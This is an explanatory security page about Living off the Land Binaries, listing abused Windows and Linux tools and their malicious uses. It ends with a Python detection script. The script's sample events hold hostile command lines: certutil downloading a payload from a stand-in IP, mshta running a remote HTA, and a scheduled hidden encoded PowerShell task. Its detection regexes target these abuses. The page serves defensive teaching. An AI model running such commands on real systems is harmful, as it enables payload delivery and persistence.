# Living off the Land Binaries (LOLBins)

**Living off the Land Binaries (LOLBins)** are legitimate, pre-installed executables and scripts on an operating system that adversaries abuse to perform malicious actions without introducing external malicious code or tools. This tactic helps attackers evade detection, as these binaries are typically trusted and signed by the operating system vendor.

#### Key Characteristics:

1. **Legitimacy**: LOLBins are part of the operating system or other installed software and have legitimate uses.
2. **Trust**: Security solutions and administrators often trust these files, making their malicious use less suspicious.
3. **Flexibility**: These binaries can perform a wide range of actions, such as downloading files, executing commands, or interacting with system resources.

#### Examples of LOLBins:

**On Windows:**

* **`cmd.exe` / `powershell.exe`**: Used to execute scripts or commands.
* **`reg.exe`**: Manipulates the Windows registry.
* **`mshta.exe`**: Executes HTML applications and can run malicious scripts.
* **`rundll32.exe`**: Executes DLLs or functions, often abused to run malicious code.
* **`certutil.exe`**: Retrieves and decodes certificates, often abused for downloading files.
* **`schtasks.exe`**: Creates scheduled tasks for persistence or execution.

**On Linux:**

* **`bash`**: Executes shell commands and scripts.
* **`wget` / `curl`**: Downloads files or communicates with remote servers.
* **`find`**: Executes other commands via the `-exec` flag.
* **`cron`**: Used for scheduling tasks (persistence).

Here is an example in which an attacker uses a legitimate pre-installed tool to download a malicious file:

<figure><img src="/files/y2jmGfZXz55v4k3u43bN" alt=""><figcaption></figcaption></figure>

#### Common Malicious Activities with LOLBins:

1. **Execution**:
   * Run scripts or commands (e.g., using `PowerShell` or `cmd.exe`).
2. **File Download**:
   * Use tools like `CertUtil` or `bitsadmin` to fetch payloads from remote servers.
3. **Data Exfiltration**:
   * Transfer stolen data using `PowerShell` or `ftp.exe`.
4. **Persistence**:
   * Use utilities like `schtasks` to create scheduled tasks for re-execution.
5. **Lateral Movement**:
   * Use `PsExec` or `wmic` to execute commands on remote systems.
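As an added defensive example (not part of the original notes), the following Python detector scans process-creation events for the LOLBins listed above combined with arguments that rarely appear in legitimate administrative use. The sample events and the rule regexes are this example's own constructed assumptions, not a vendor rule set.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample process-creation events, shaped like the Image and
# CommandLine fields of Sysmon Event ID 1 or Windows Security event 4688.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://203.0.113.10/update.bin C:\Users\Public\u.bin"},
    {"image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -dump C:\certs\corp-root.cer"},          # benign certificate use
    {"image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe http://203.0.113.10/page.hta"},
    {"image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe shell32.dll,Control_RunDLL"},           # benign Control Panel launch
    {"image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /create /sc minute /mo 5 /tn Updater /tr "powershell -w hidden -enc <b64>"'},
]

# Detection rules (constructed heuristics for this example):
# (rule name, regex on the executable's file name, regex on the command line).
# Each pairs a LOLBin from the list above with arguments that are unusual in
# normal admin use, e.g. certutil fetching a URL instead of a local certificate.
RULES: List[Tuple[str, str, str]] = [
    ("certutil_download",  r"^certutil\.exe$",  r"-urlcache|-verifyctl|\bhttps?://"),
    ("mshta_remote",       r"^mshta\.exe$",     r"\bhttps?://|javascript:|vbscript:"),
    ("rundll32_script",    r"^rundll32\.exe$",  r"javascript:|\bhttps?://"),
    ("schtasks_hidden_ps", r"^schtasks\.exe$",  r"/create.*(powershell|cmd).*(-w hidden|-enc|-nop)"),
    ("bitsadmin_transfer", r"^bitsadmin\.exe$", r"/transfer|/addfile"),
]


def image_basename(image_path: str) -> str:
    """Return the lower-cased file name from a Windows image path."""
    return image_path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_lolbin_abuse(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (rule_name, cmdline) for each event that matches a rule.

    The binary is identified from the Image field rather than from the first
    token of the command line, because the command line is attacker-controlled.
    """
    hits = []
    for ev in events:
        name = image_basename(ev["image"])
        for rule, bin_re, arg_re in RULES:
            if re.search(bin_re, name) and re.search(arg_re, ev["cmdline"], re.IGNORECASE):
                hits.append((rule, ev["cmdline"]))
                break  # one alert per event is enough for triage
    return hits


if __name__ == "__main__":
    for rule, cmd in detect_lolbin_abuse(SAMPLE_EVENTS):
        print(f"[{rule}] {cmd}")
```

The benign certutil and rundll32 events in the sample produce no alert, which is the point: the binary alone is not the signal, the binary plus its arguments is.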
